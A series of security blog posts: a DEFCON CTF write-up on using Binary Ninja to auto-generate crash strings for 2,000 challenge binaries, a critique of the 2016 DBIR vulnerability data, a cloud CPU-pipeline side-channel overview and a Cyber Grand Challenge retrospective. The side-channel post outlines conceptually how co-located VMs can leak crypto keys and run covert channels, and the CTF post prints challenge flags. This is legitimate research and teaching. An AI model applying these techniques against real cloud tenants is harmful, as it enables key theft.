2000 cuts with Binary Ninja

Using Vector35’s Binary Ninja, a promising new interactive static analysis and reverse engineering platform, I wrote a script that generated “exploits” for 2,000 unique binaries in this year’s DEFCON CTF qualifying round.

If you’re wondering how to remain competitive in a post-DARPA DEFCON CTF, I highly recommend you take a look at Binary Ninja.

Before I share how I slashed through the three challenges — 334 cuts, 666 cuts, and 1,000 cuts — I have to acknowledge the tool that made my work possible.

Compared to my experience with IDA, which is held together with duct tape and prayers, Binary Ninja’s workflow is a pleasure. It does analysis on its own intermediate language (IL), which is exposed through Python and C++ APIs. It’s comparatively simple to query blocks of code, functions, trace execution flow, query register states, and many other tasks that seem herculean within IDA.

This brought a welcome distraction from the slew of stack-based buffer overflows and unhardened heap exploitation that have come to characterize DEFCON’s CTF.

Since the original point of CTF competitions was to help people improve, I limited my options to what most participants could use. Without Binary Ninja, I would have had to:

  1. Use IDA and IDAPython; a more expensive and unpleasant proposition.
  2. Develop a Cyber Reasoning System; an unrealistic option for most participants.
  3. Reverse the binaries by hand; effectively impossible given the number of binaries.

None of these are nearly as attractive as Binary Ninja.

How Binary Ninja accelerates CTF work

This year’s qualifying challenges were heavily focused on preparing competitors for the Cyber Grand Challenge (CGC). A full third of the challenges were DECREE-based. Several required CGC-style “Proof of Vulnerability” exploits. This year the finals will be based on DECREE so the winning CGC robot can ‘play’ against the human competitors. For the first time in its history, DEFCON CTF is abandoning the attack-defense model.

Challenge #1 : 334 cuts

334 cuts

The first challenge, 334 cuts, didn’t offer much in terms of direction. I started by connecting to the challenge service:

$ nc 334_cuts_22ffeb97cf4f6ddb1802bf64c03e2aab.quals.shallweplayaga.me 10334
send your crash string as base64, followed by a newline

Okay, so it wants us to crash the service, no problem; I already had a crashing input string for that service already from a previous challenge.

$ nc 334_cuts_22ffeb97cf4f6ddb1802bf64c03e2aab.quals.shallweplayaga.me 10334
send your crash string as base64, followed by a newline

I wasn’t expecting a second challenge name after the first. I’m guessing I’m going to need to crash a few services now. Next I extracted the tarball.

$ tar jxf 334_cuts.tar.bz2
$ ls 334_cuts
$ ls 334_cuts | wc -l

Hmm, there are 334 DECREE challenge binaries, all with food-related names. Well, time to throw them into Binja. Starting with easy-biroldo-with-mayonnaise-on-multigrain. DECREE challenge binaries are secretly ELF binaries (as used on Linux and FreeBSD), so they load just fine with Binja’s ELF loader.


Binary Ninja has a simple and smooth interface

This challenge binary is fairly simple and nearly identical to easy-prasky-with-buffalo-on-bing. Each challenge binary is stripped of symbols, has a static stack buffer, a canary, and a stack-based buffer overflow. The canary is copied to the stack and checked against a hard coded value. If the canary is overwritten, the challenge terminates and does not crash. Any overflow will have to make sure the canary value is overwritten with the expected value. It turns out all 334 challenges only differ in four ways:

  1. The size of the buffer you overflow
  2. The canary string and its length
  3. The size of the stack buffer in the recvmsg function
  4. The amount of data the writemsg function proceses for each iteration of its write loop

Our crashing string has to exactly overflow both the stack buffer and pass the canary check in each of the 334 binaries. It’s best to automate collecting this information. Thankfully Binja can be used as a headless analysis engine from Python!

We start by importing binja into our python script and creating a binary view. The binary view is our main interface to Binja’s analysis.

I was initially trying to create a generic solution without looking at the majority of the challenge binaries, so I found the main function programmatically. I did that by starting at the entry point and knowing that it made two calls.

From the entry point, I knew there were two calls with the second being the one I wanted. Similarly, I knew the next function had one call and the call was the one I wanted to follow to main. All my analysis used Binja’s LowLevelIL.

Once we have our reference to main, the real fun begins.


Binary Ninja in LowLevelIL mode

The first thing we needed to figure out was the canary string. The approach I took was to collect references to all the call instructions:

Then I knew that the first call was to a memcpy, the second was to recvmsg, and the third was to the canary memcmp. Small hiccup here, sometimes the compiler would inline the memcpy. This happened when the canary string string was less than 16 bytes long.


This Challenge Binary has an inline memcpy.😦

This was a simple fix, as I now counted the number of calls in the function and adjusted my offsets accordingly:

To extract the canary and size of the canary buffer, I used the newly introduced get_parameter_at() function. This function is fantastic: at any caller site, it allows you to query the function parameters with respect to calling convention and system architecture. I used it to query all the parameters for the call to memcmp.

Next I need to know how big the buffer to overflow is. To do this, I once again used get_parameter_at() to query the first argument for the read_buf call. This points to the stack buffer we’ll overflow. We can calculate its size by subtracting the offset of the canary’s stack buffer.

It turns out the other two variables were inconsequential. These two bits of information were all we needed to craft our crashing string.

I glued all this logic together and threw it at the 334 challenge. It prompted me for 10 crashing strings before giving me the flag: baby's first crs cirvyudta.

Challenge #2: 666 cuts

666 cuts

To start, I once again connected with netcat:

$ nc 666_cuts_e38431570c1b4b397fa1026bb71a0576.quals.shallweplayaga.me 10666
send your crash string as base64, followed by a newline

I’m expecting 666 challenge binaries.

$ tar jxf 666_cuts.tar.bz2
$ ls 666_cuts
$ ls 666_cuts | wc -l

Same game as before, I throw a random binary into binja and it’s nearly identical to the set from 334. At this point I wonder if the same script will work for this challenge. I modify it to connect to the new service and run it. The new service provides 10 challenge binary names to crash and my script provides 10 crashing strings, before printing the flag: you think this is the real quaid DeifCokIj.

Challenge #3: 1000 cuts

1000 cuts

You get the idea, 1000 challenges, same script, flag is: do you want a thousand bandages gruanfir3.

Room For Improvement

Binary Ninja shows a lot of promise, but it still has a ways to go. In future versions I hope to see the addition of SSA and a flexible type system. Once SSA is added to Binary Ninja, it will be easier to identify data flows through the application, tell when types change, and determine when stack slots are reused. It’s also a foundational feature that helps build a decompiler.


From its silky smooth graph view to its intermediate language to its smart integration with Python, Binary Ninja provides a fantastic interface for static binary analysis. With minimal effort, it allowed me to extract data from 2000 binaries quickly and easily.

That’s the bigger story here: It’s possible to enhance our capabilities and combine mechanical efficiency with human intuition. In fact, I’d say it’s preferable. We’re not going to become more secure if we rely on machines entirely. Instead, we should focus on building tools that make us more effective; tools like Binary Ninja.

If you agree, give Binary Ninja a chance. In less than a year of development, it’s already punching above its weight class. Expect more fanboyism from myself and the rest of Trail of Bits — especially as Binary Ninja continues to improve.

My (slightly updated) script is available here. For the sake of history, the original is available here.

Binary Ninja is currently in a private beta and has a public Slack.

The DBIR’s ‘Forest’ of Exploit Signatures

If you follow the recommendations in the 2016 Verizon Data Breach Investigations Report (DBIR), you will expose your organization to more risk, not less. The report’s most glaring flaw is the assertion that the TLS FREAK vulnerability is among the ‘Top 10’ most exploited on the Internet. No experienced security practitioner believes that FREAK is widely exploited. Where else did Verizon get it wrong?

This question undermines the rest of the report. The DBIR is a collaborative effort involving 60+ organizations’ proprietary data. It’s the single best source of information for enterprise defenders, which is why it’s a travesty that its section on vulnerabilities used in data breaches contains misleading data, analysis, and recommendations.

Verizon must ‘be better.’ They have to set a higher standard for the data they accept from collaborators. I recommend they base their analysis on documented data breaches, partner with agent-based security vendors, and include a red team in the review process. I’ll elaborate on these points later.

Digging into the vulnerability data

For the rest of this post, I’ll focus on the DBIR’s Vulnerability section (pages 13-16). There, Verizon uses bad data to discuss trends in software exploits used in data breaches. This section was contributed by Kenna Security (formerly Risk I/O), a vulnerability management startup with $10 million in venture funding. Unlike the rest of the report, nothing in this section is based on data breaches.


The Kenna Security website claims they authored the Vulnerabilities section in the 2016 DBIR

It’s easy to criticize the analysis in the Vulnerabilities section. It repeats common tropes long attacked by the security community, like simple counting of known vulnerabilities (Figures 11, 12, and 13). Counting vulnerabilities fails to consider the number of assets, their importance to the business, or their impact. There’s something wrong with the underlying data, too.

Verizon notes in the section’s header that portions of the data come from vulnerability scanners. In footnote 8, they share some of the underlying data, a list of the top 10 exploited vulnerabilities as detected by Kenna. According to the report, these vulnerabilities represent 85% of successful exploit traffic on the Internet.


Footnote 8 lists the vulnerabilities most commonly used in data breaches

Jericho at OSVDB was the first to pick apart this list of CVEs. He noted that the DBIR never explains how successful exploitation is detected (their subsequent clarification doesn’t hold water), nor what successful exploitation means in the context of a vulnerability scanner. Worse, he points out that among the ‘top 10’ are obscure local privilege escalations, denial of service flaws for Windows 95, and seemingly arbitrary CVEs from Oracle CPUs.

Rory McCune at NCC was the second to note discrepancies in the top ten list. Rory zeroed in on the fact that one of Kenna’s top 10 was the FREAK TLS flaw which requires network man-in-the-middle, a vulnerable server, a vulnerable client to exploit, and substantial computational power to pull it off at scale. Additionally, successful exploitation produces no easily identifiable network signature. In the face of all this evidence against the widespread exploitation of FREAK, Kenna’s extraordinary claims require extraordinary evidence.

When questioned about similar errors in the 2015 DBIR, Kenna’s Chief Data Scientist Michael Rohytman explained, “the dataset is based on the correlation of ids exploit signatures with open vulns.” Rohytman later noted that disagreements about the data likely stem from differing opinions about the meaning of “successful exploitation.”

These statements show that the vulnerability data is unlike all other data used in the DBIR. Rather than the result of a confirmed data breach, the “successful exploit traffic” of these “mega-vulns” was synthesized by correlating vulnerability scanner output with intrusion detection system (IDS) alerts. The result of this correlation does not describe the frequency nor tactics of real exploits used in the wild.

Obfuscating with fake science

Faced with a growing chorus of criticism, Verizon and Kenna published a blog post that ignores critics, attempts to obfuscate their analysis with appeals to authority, substitutes jargon for a counterargument, and reiterates dangerous enterprise security policies from the report.


Kenna’s blog post begins with appeals to authority and ad hominem attacks on critics

The first half of the Kenna blog post moves the goalposts. They present a new top ten list that, in many ways, is even more disconnected from data breaches than the original. Four of the ten are now Denial of Service (DoS) flaws which do not permit unauthorized access to data. Two more are FREAK which, if successfully exploited, only permit access to HTTPS traffic. Three are 15-year-old UPnP exploits that only affect Windows XP SP0 and lower. The final exploit is Heartbleed which, despite potentially devastating impact, can be traced to few confirmed data breaches since its discovery.

Kenna’s post does answer critics’ calls for the methodology used to define a ‘successful exploitation’: an “event” where 1) a scanner detects an open vulnerability, 2) an IDS triggers on that vulnerability, and 3) one or more post-exploitation indicators of compromise (IOCs) are triggered, presumably all on the same host. This approach fails to account for the biggest challenge with security products: false positives.


Kenna is using a synthetic benchmark for successful exploitation based on IDS signatures

Flaws in the data

As mentioned earlier, the TLS FREAK vulnerability is the most prominent error in the DBIR’s Vulnerabilities section. FREAK requires special access as a network Man-in-the-Middle (MITM). Successful exploitation only downgrades the protections from TLS. An attacker would then have to factor a 512-bit RSA modulus to decrypt the session data; an attack that cost US$75 for each session around the time the report was in production. After decrypting the result, they’d just have a chat log; no access to either the client nor server devices. Given all this effort, the low pay-off, and the comparative ease and promise of other exploits, it’s impossible that the TLS FREAK flaw would have been one of the ten most exploited vulnerabilities in 2015.

The rest of the section’s data is based on correlations between intrusion detection systems and vulnerability scanners. This approach yields questionable results.

All available evidence (threat intel reports, the Microsoft SIR, etc.) show that real attacks occur on the client side: Office, PDF, Flash, Browsers, etc. These vulnerabilities, which figure so prominently in Microsoft data and DFIR reports about APTs, don’t appear in the DBIR. How come exploit kits and APTs are using Flash as a vector, yet Kenna’s top 10 fails to list a single Flash vulnerability? Because, by and large, these sorts of attacks are not visible to IDS nor vulnerability scanners. Kenna’s data comes from sources that cannot see the actual attacks.

Intrusion detection systems are designed to inspect traffic and apply a database of known signatures to the specific protocol fields. If a match appears, most products will emit an alert and move on to the next packet. This “first exit” mode helps with performance, but it can lead to attack shadowing, where the first signature to match the traffic generates the only alert. This problem gets worse when the first signature to match is a false positive.

The SNMP vulnerabilities reported by Kenna (CVE-2002-0012, CVE-2002-0013) highlight the problem of relying on IDS data. The IDS signatures for these vulnerabilities are often triggered by benign security scans and network discovery tools. It is highly unlikely that a 14-year old DoS attack would be one of the most exploited vulnerabilities across corporate networks.

Vulnerability scanners are notorious for false positives. These products often depend on credentials to gather system information, but fall back to less-reliable testing methods as a last resort. The UPnP issues reported by Kenna (CVE-2001-0877, CVE-2001-0876) are false positives from vulnerability scanning data. Similar to the SNMP issues, these vulnerabilities are often flagged on systems that are not Windows 98, ME, or XP, and are considered line noise by those familiar with vulnerability scanner output.

It’s unclear how the final step of Kenna’s three-step algorithm, detection of post-exploitation IOCs, supports correlation. In the republished top ten list, four of the vulnerabilities are DoS flaws and two enable HTTPS downgrades. What is a post-exploitation IOC for a DoS? In all of the cases listed, the target host would crash, stop receiving further traffic, and likely reboot. It’s more accurate to interpret post-exploitation IOCs to mean, “more than one IDS signature was triggered.”

The simplest explanation for Kenna’s results? A serious error in the correlation methodology.

Issues with the methodology

Kenna claims to have 200+ million successful exploit events in their dataset. In nearly all the cases we know about, attackers use very few exploits. Duqu duped Kaspersky with just two exploits. Phineas Phisher hacked Hacking Team with just one exploit. Stuxnet stuck with four exploits. The list goes on. There are not 50+ million breaches in a year. This is a sign of poor data quality. Working back from the three-step algorithm described earlier, I conclude that Kenna counted IDS signatures fired, not successful exploit events.

There are some significant limitations to relying on data collected from scanners and IDS. Of the thousands of companies that employ these devices -and who share the resulting data with Kenna- a marginal number go through the effort of configuring their systems properly. Without this configuration, the resulting data is a useless cacophony of false positives. Aggregating thousands of customers’ noisy datasets is no way to tune into a meaningful signal. But that’s precisely what Kenna asks the DBIR’s readers to accept as the basis for the Vulnerabilities section.

Let’s remember the hundreds of companies, public initiatives, and bots scanning the Internet. Take the University of Michigan’s Scans.io as one example. They scan the entire Internet dozens of times per day. Many of these scans would trigger Kenna’s three-part test to detect a successful exploit. Weighting the results by the number of times an IDS event triggers yields a disproportionate number of events. If the results aren’t normalized for another factor, the large numbers will skew results and insights.

Screen Shot 2016-05-05 at 11.57.35 PM

Kenna weighted their results by the number of IDS events

Finally, there’s the issue of enterprises running honeypots. A honeypot responds positively to any attempt to hack into it. This would also “correlate” with Kenna’s three-part algorithm. There’s no indication that such systems were removed from the DBIR’s dataset.

In the course of performing research, scientists frequently build models of how they think the real world operates, then back-test them with empirical data. High-quality sources of empirical exploit incidence data are available from US-CERT, which coordinates security incidents for all US government agencies, and Microsoft, which has unique data sources like Windows Defender and crash reports from millions of PCs. From their reports, only the Heartbleed vulnerability appears in Kenna’s list. The rest of the data and recommendations from US-CERT and Microsoft match. Neither of them agree with Kenna.

Ignore the DBIR’s vulnerability recommendations

“This is absolutely indispensable when we defenders are working together against a sentient attacker.” — Kenna Security

Even if you take the DBIR’s vulnerability analysis at face value, there’s no basis for assuming human attackers behave like bots. Scan and IDS data does not correlate to what real attackers would do. The only way to determine what attackers truly do is to study real attacks.



Kenna Security advocates a dangerous patch strategy based on faulty assumptions

Empirical data disagrees with this approach. Whenever new exploits and vulnerabilities come out, attacks spike. This misguided recommendation has the potential to cause real, preventable harm. In fact, the Vulnerabilities section of the DBIR both advocates this position and then refutes it only one page later.


The DBIR presents faulty information on page 13…


… then directly contradicts itself only one page later

Recommendations from this section fall victim to many of the same criticisms of pure vulnerability counting: they fail to consider the number of assets, the criticality of them, the impact of vulnerabilities, and how they are used by real attackers. Without acknowledging the source of the data, Verizon and Kenna walk the reader down a dangerous path.

Improvements for the 2017 DBIR

“It would be a shame if we lost the forest for the exploit signatures.”
— Michael Rohytman, Chief Data Scientist, Kenna

This closing remark from Kenna’s rebuttal encapsulates the issue: exploit signatures were used in lieu of data from real attacks. They skipped important steps while collecting data over the past year, jumped to assumptions based on scanners and IDS devices, and appeared to hope that their conclusions would align with what security professionals see on the ground. Above all, this incident demonstrates the folly of applying data science without sufficient input from practitioners. The resulting analysis and recommendations should not be taken seriously.

Kenna’s 2015 contribution to the DBIR received similar criticism, but they didn’t change for 2016. Instead, Verizon expanded the Vulnerability section and used it for the basis of recommendations. It’s alarming that Verizon and Kenna aren’t applying critical thinking to their own performance. They need to be more ambitious with how they collect and analyze their data.

Here’s how the Verizon 2017 DBIR could improve on its vulnerability reporting:

  1. Collect exploit data from confirmed data breaches. This is the basis for the rest of the DBIR’s data. Their analysis of exploits should be just as rigorous. Contrary to what I was told on Twitter, there is enough data to achieve statistical relevance. With the 2017 report a year away, there’s enough time to correct the processes of collecting and analyzing exploit data. Information about vulnerability scans and IDS signatures don’t serve the information security community, nor their customers.
  2. That said, if Verizon wants to take more time to refine the quality of the data they receive from their partners, why not partner with agent-based security vendors in the meantime? Host-based collection is far closer to exploits than network data. CrowdStrike, FireEye, Bit9, Novetta, Symantec and more all have agents on hosts that can detect successful exploitation based on process execution and memory inspection; more reliable factors.
  3. Finally, include a red team in the review process of future reports. It wasn’t until the 2014 DBIR that attackers’ patterns were separated into nine categories; a practice that practitioners had developed years earlier. That technique would have been readily available if the team behind the DBIR had spoken to practitioners who understand how to break and defend systems. Involving a red team in the review process would strengthen the report’s conclusions and recommendations.

Be better

For the 2016 DBIR, Verizon accepted a huge amount of low-quality data from a vendor. They reprinted the analysis verbatim. Clearly, no one who understands vulnerabilities was involved in the review process. The DBIR team tossed in some data-science vocab for credibility, and a few distracting jokes, and asked for readers’ trust.

Worse, Verizon stands behind the report, rather than acknowledge and correct the errors.

Professionals and businesses around the world depend on this report to make important security decisions. It’s up to Verizon to remain the dependable source for our industry.

I’d like to thank HD Moore, Thomas Ptacek, Grugq, Dan Rosenberg, Mike Russell, Kelly Shortridge, Rafael Turner, the entire team at Trail of Bits, and many others that cannot be cited for their contributions and comments on this blog post.


Rory McCune has posted a followup where he notes a huge spike in Kenna’s observed exploitation of FREAK occurs at exactly the same time that the University of Michigan was scanning the entire internet for it. This supports the theory that benign internet-wide scans made it into Kenna’s data set where they were scaled by their frequency of occurrence.

Kenna's data on FREAK overlaps precisely with internet-wide scans from the University of Michigan

Kenna’s data on FREAK overlaps precisely with internet-wide scans from the University of Michigan

Further, an author of FREAK has publicly disclaimed any notion that it was widely exploited.


Rob Graham has pointed out that typical IDS signatures for FREAK do not detect attacks but rather only detect TLS clients that offer weak cipher suites. This supports the theory that the underlying data was not inspected nor were practitioners consulted prior to using this data in the DBIR.


Justin Kennedy has shared exploit data from five years of penetration tests conducted against his clients and noted that FREAK and Denial of Service attacks never once assisted compromising a target. This supports the theory that exploitation data in the DBIR distorts the view on the ground.


Threatbutt has immortalized this episode with the release of their Danger Zone Incident Retort (DZIR).


Karim Toubba, Kenna Security CEO, has posted a mea culpa on their blog. He notes that they did not confirm any of their analysis with their own product before delivering it to Verizon for inclusion in the DBIR.

What is the point of Kenna's contribution if it was not backed by their insights?

Kenna’s contribution to the DBIR was not validated by their own product

Further, Karim notes that their platform ranks FREAK as a “25 out of 100”, however, even this ranking is orders of magnitude too high based on the available evidence. This introduces the question of whether the problems exposed in Kenna’s analysis from the DBIR extend into their product as well.

Screen Shot 2016-05-12 at 1.40.36 PM

Kenna’s product prioritizes FREAK an order of magnitude higher than it likely should be

Finally, I consider the criticisms in this blog post applicable to their entire contribution to the DBIR and not only their “top ten successfully exploited vulnerabilities” list. Attempts to pigeonhole this criticism to the top ten miss the fact that other sections of the report are based on the same or similar data from Kenna.


Verizon published their own mea culpa.


Software Security Ideas Ahead of Their Time

Every good security researcher has a well-curated list of blogs they subscribe to. At Trail of Bits, given our interest in software security and its intersections with programming languages, one of our favorites is The Programming Language Enthusiast by Michael Hicks.

Our primary activity is to describe and discuss research about — and the practical development and use of — programming languages and programming tools (PLPT). PLPT is a core area of computer science that bridges high-level algorithms/designs and their executable implementations. It is a field that has deep roots in mathematical logic and the theory of computation but also produces practical compilers and analysis tools.

One of our employees and PhD student at UMD, Andrew Ruef, has written a guest blog post for the PL Enthusiast on the topic of software security ideas that were ahead of their time.

As researchers, we are often asked to look into a crystal ball. We try to anticipate future problems so that work we begin now will address problems before they become acute. Sometimes, a researcher foresees a problem and its possible solution, but chooses not to pursue it. In a sense, she has found, and discarded, an idea ahead of its time.

Recently, a friend of Andrew’s pointed him to a 20-year-old email exchange on the “firewalls” mailing list that blithely suggests, and discards, problems and solutions that are now quite relevant, and on the cutting edge of software security research. The situation is both entertaining and instructive, especially in that the ideas are quite squarely in the domain of programming languages research, but were not considered by PL researchers at the time (as far as we know).

Read on for a deep dive into the firewalls listserv from 1995, prior to the publication of Smashing the Stack for Fun and Profit, as a few casual observers correctly anticipate the next 20 years of software security researchers.

If you enjoyed Andrew’s post on the PL Enthusiast, we recommend a few others that touch upon software security:

Hardware Side Channels in the Cloud

At REcon 2015, I demonstrated a new hardware side channel which targets co-located virtual machines in the cloud. This attack exploits the CPU’s pipeline as opposed to cache tiers which are often used in side channel attacks. When designing or looking for hardware based side channels – specifically in the cloud – I analyzed a few universal properties which define the ‘right’ kind of vulnerable system as well as unique ones tailored to the hardware medium.

Slides and full research paper found here.

The relevance of side channel attacks will only increase. Especially attacks which target the vulnerabilities inherent to systems which share hardware resources – such as in cloud platforms.

Virtualization of Physical Resources

Figure 1: virtualization of physical resources


Any meaningful information that you can leak from the environment running the target application or, in this case, the victim virtual machine counts as a side channel. However, some information is better than others. In this case a process (the attacker) must be able to repeatedly record an environment ‘artifact’ from inside one virtual machine.

In the cloud, these environment artifacts are the shared physical resources used by the virtual machines. The hypervisor dynamically partitions each resource and this is then seen by a single virtual machine as its private resource. The side channel model (Figure 2) illustrates this.

Knowing this, the attacker can affect that resource partition in a recordable way, such as by flushing a line in the cache tier, waiting until the victim process uses it for an operation, then requesting that address again – recording what values are now there.

Figure 2: Side Channel Model

Figure 2: side channel model


Great! So we can record things from our victim’s environment – but now what? Depending on what the victim’s process is doing we can actually employ several different types of attacks.

1. crypto key theft

Crypto keys are great, private crypto keys are even better. Using this hardware side channel, it’s possible to leak the bytes of the private key used by a co-located process. In one scenario, two virtual machines are allocated the same space on the L3 cache at different times. The attacker flushes a certain cache address, waits for the victim to use that address, then queries it again – recording the new values that are there [1].

2. process monitoring ( what applications is the victim running? )

This is possible when you record enough of the target’s behavior, i.e. CPU or pipeline usage or values stored in memory. A mapping between the recording to a specific running process can be constructed with a varied degree of certainty. Warning, this does rely on at least a rudimentary knowledge of machine learning.

3. environment  keying ( great for proving co-location! )

Using the environment recordings taken off of a specific hardware resource, you can also uniquely identify one server from another in the cloud. This is useful to prove that two virtual machines you control are co-resident on the same physical server. Alternatively, if you know the behavior signature of a server your target is on, you can repeatedly create virtual machines, recording the behavior on each system until you find a match [2].

4. broadcast signal ( receive messages without the internet :0 )

If a colluding process is purposefully generating behavior on a pre-arranged hardware resource, such as purposefully filling a cache line with 0’s and 1’s, the attacker (your process) can record this behavior in the same way it would record a victim’s behavior. You then can translate the recorded values into pre-agreed messages. Recording from different hardware mediums results in a channel with different bandwidths [3].

The Cache is Easy, the Pipeline is Harder

Now all of the above examples used the cache to record the environment shared by both victim and attacker processes. Cache is the most widely used in both literature and practice to construct side channels as well as being the easiest to record artifacts from. Basically everyone loves cache.

The cache isn’t the only shared resource: co-located virtual machines also share the CPU execution pipeline. In order to use the CPU pipeline, we must be able to record a value from it. However, there is no easy way for any process to query the state of the pipeline over time – it is like a virtual black-box. The only thing a process can know is the instruction set order it gives to be executed on the pipeline and the result the pipeline returns.

out-of-order execution

( the pipeline’s artifact )

We can exploit this pipeline optimization as a means to record the state of the pipeline. The known input instruction order will result in two different return values – one is the expected result(s), the other is the result if the pipeline executions them out-of-order.

Figure 3: Foreign Processes Can Share the Same Pipeline

Figure 3: foreign processes can share the same pipeline

strong memory ordering

Our target, cloud processors, can be assumed to be x86/64 architecture – implying a usually strongly-ordered memory model [4]. This is important because the pipeline will optimize the execution of instructions but attempt to maintain the right order of stores to memory and loads from memory

…HOWEVER, the stores and loads from different threads may be reordered by out-of-order-execution. Now this reordering is observable if we’re clever.

recording instruction reorder ( or how to be clever )

In order for the attacker to record the “reordering” artifact from the pipeline, we must record two things for each of our two threads:

  • input instruction order
  • return value

Additionally, the instructions in each thread must contain a STORE to memory and a LOAD from memory. The LOAD from memory must reference the location stored to by the opposite thread. This setup ensures the possibility for the four cases illustrated below. The last is the artifact we record – doing so several thousand times gives us averages over time.

Figure 4: the attacker can record when its instructions are reordered

Figure 4: the attacker can record when its instructions are reordered

sending a message

To make our attacks more interesting, we want to be able force the amount of recorded out-of-order-executions. This ability is useful for other attacks, such as constructing covert communication channels.

In order to do this, we need to alter how the pipeline’s optimization works – either by increasing the probability that it will or will not reorder our two threads. The easiest is to enforce a strong memory order and guarantee that the attacker will receive less out-of-order-executions.

memory barriers

In the x86 instruction set, there are specific barrier instructions that will stop the processor from reordering the four possible combinations of STORE’s and LOAD’s. What we’re interested in is forcing a strong order when the processor encounters an instruction set with a STORE followed by a LOAD.

The instruction mfence does exactly this.

By have the colluding process inject these memory barriers in the pipeline, the attacker’s instructions will not be reordered, forcing a noticeable decrease in the recorded averages. Doing this in distinct time frames allows us to send a binary message.

Figure 5: mfence ensures the strong memory order on pipeline

Figure 5: mfence ensures the strong memory order on pipeline


The takeaway is that even with virtualization separating your virtual machine from the hundreds of other alien virtual machines, the pipeline can’t distinguish your process’s instructions from all the other ones and we can use that to our advantage. :0

If you would like to learn more about this side channel technique, please read the full paper here.

  1. https://eprint.iacr.org/2013/448.pdf
  2. http://www.ieee-security.org/TC/SP2011/PAPERS/2011/paper020.pdf
  3. https://www.cs.unc.edu/~reiter/papers/2014/CCS1.pdf
  4. http://preshing.com/20120930/weak-vs-strong-memory-models/

How We Fared in the Cyber Grand Challenge

The Cyber Grand Challenge qualifying event was held on June 3rd, at exactly noon Eastern time. At that instant, our Cyber Reasoning System (CRS) was given 131 purposely built insecure programs. During the following 24 hour period, our CRS was able to identify vulnerabilities in 65 of those programs and rewrite 94 of them to eliminate bugs built in their code. This proves, without a doubt, that it is not only possible but achievable to automate the actions of a talented software auditor.

Despite the success of our CRS at finding and patching vulnerabilities, we did not qualify for the final event, to be held next year. There was a fatal flaw that lowered our overall score to 9th, below the 7th place threshold for qualification. In this blog post we’ll discuss how our CRS works, how it performed against competitor systems, what doomed its score, and what we are going to do next.

Cyber Grand Challenge Background

The goal of the Cyber Grand Challenge (CGC) is to combine the speed and scale of automation with the reasoning capabilities of human experts. Multiple teams create Cyber Reasoning Systems (CRSs) that autonomously reason about arbitrary networked programs, prove the existence of flaws in those programs, and automatically formulate effective defenses against those flaws. How well these systems work is evaluated through head-to-head tournament-style competition.

The competition has two main events: the qualifying event and the final event. The qualifying event was held on June 3, 2015. The final event is set to take place during August 2016. Only the top 7 competitors from the qualifying event proceed to the final event.

During the qualifying event, each competitor was given the same 131 challenges, or purposely built vulnerable programs, each of which contained at least one intentional vulnerability. For 24 hours, the competing CRSes faced off against each other and were scored according to four criteria. The full details are in the CGC Rules, but here’s a quick summary:

  • The CRS had to work without human intervention. Any teams found to use human assistance were disqualified.
  • The CRS had to patch bugs in challenges. Points were gained for every bug successfully patched. Challenges with no patched bugs received zero points.
  • The CRS could prove bugs exist in challenges. The points from patched challenges were doubled if the CRS could generate an input that crashed the challenge.
  • The patched challenges had to function and perform almost as well as the originals. Points were lost based on performance and functionality loss in the patched challenges.

A spreadsheet with all the qualifying event scores and other data used to make the graphs in this post is available from DARPA (Trail of Bits is the ninth place team). With the scoring in mind, let’s review the Trail of Bits CRS architecture and the design decisions we made.


We’re a small company with a distributed workforce, so we couldn’t physically host a lot of servers. Naturally, we went with cloud computing to do processing; specifically, Amazon EC2. Those who saw our tweets know we used a lot of EC2 time. Most of that usage was purely out of caution.

We didn’t know how many challenges would be in the qualifying event — just that it would be “more than 100.” We prepared for a thousand, with each accompanied by multi-gigabyte network traffic captures. We were also terrified of an EC2 region-wide failure, so we provisioned three different CRS instances, one in each US-based EC2 region, affectionately named Biggie (us-east-1), Tupac (us-west-2), and Dre (us-west-1).

It turns out that there were only 131 challenges and no gigantic network captures in the qualifying event. During the qualifying event, all EC2 regions worked normally. We could have comfortably done the qualifying event with 17 c4.8xlarge EC2 instances, but instead we used 297. Out of our abundance of caution, we over-provisioned by a factor of ~17x.

Bug Finding

The Trail of Bits CRS was ranked second by the number of verified bugs found (Figure 1). This result is impressive considering that we started with nothing while several other teams already had existing bug finding systems prior to CGC.

Figure 1: Teams in the qualifying event ranked by number of bugs found. Orange bars signify finalists.

Our CRS used a multi-pronged strategy to find bugs (Figure 2). First, there was fuzzing. Our fuzzer is implemented with a custom dynamic binary translator (DBT) capable of running several 32-bit challenges in a single 64-bit address space. This is ideal for challenges that feature multiple binaries communicating with one another. The fuzzer’s instrumentation and mutation are separated, allowing for pluggable mutation strategies. The DBT framework can also snapshot binaries at any point during execution. This greatly improves fuzzing speed, since it’s possible to avoid replaying previous inputs when exploring new input space.

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.

In addition to fuzzing, we had not one but two symbolic execution engines. The first operated on the original unmodified binaries, and the second operated on the translated LLVM from mcsema. Each symbolic execution engine had its own strengths, and both contributed to bug finding.

The fuzzer and symbolic execution engines operate in a feedback loop mediated by a system we call MinSet. The MinSet uses branch coverage to maintain a minimum set of maximal coverage inputs. The inputs come from any source capable of generating them: PCAPs, fuzzing, symbolic execution, etc. Every tool gets original inputs from MinSet, and feeds any newly generated inputs into MinSet. This feedback loop lets us explore the possible input state with both fuzzers and symbolic execution in parallel. In practice this is very effective. We log the provenance of our crashes, and most of them look something like:

Network Capture ⇒ Fuzzer ⇒ SymEx1 ⇒ Fuzzer ⇒ Crash

Some bugs can only be triggered when the input replays a previous nonce, which would be different on every execution of the challenge. Our bug finding system can produce inputs that contain variables based on program outputs, enabling our CRS to handle such cases.

Additionally, our symbolic executors are able to identify which inputs affect program state at the point of a crash. This is a key requirement for the success of any team competing in the final as it enables the CRS to create a more controlled crash.


Our CRS’s patching effectiveness, as measured by the security score, ranks as fourth (Figure 3).

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.

Our CRS patches bugs by translating challenges into LLVM bitcode with mcsema. Patches are applied to the LLVM bitcode, optimized, and then converted back into executable code. The actual patching works by gracefully terminating the challenge when invalid memory accesses are detected. Patching the LLVM bitcode representation of challenges provides us with enormous power and flexibility:

  • We can easily validate any memory access and keep track of all memory allocations.
  • Complex algorithms, such as dataflow tracking, dominator trees, dead store elimination, loop detection, etc., are very simple to implement using the LLVM compiler infrastructure.
  • Our patching method can be used on real-world software, not just CGC challenges.

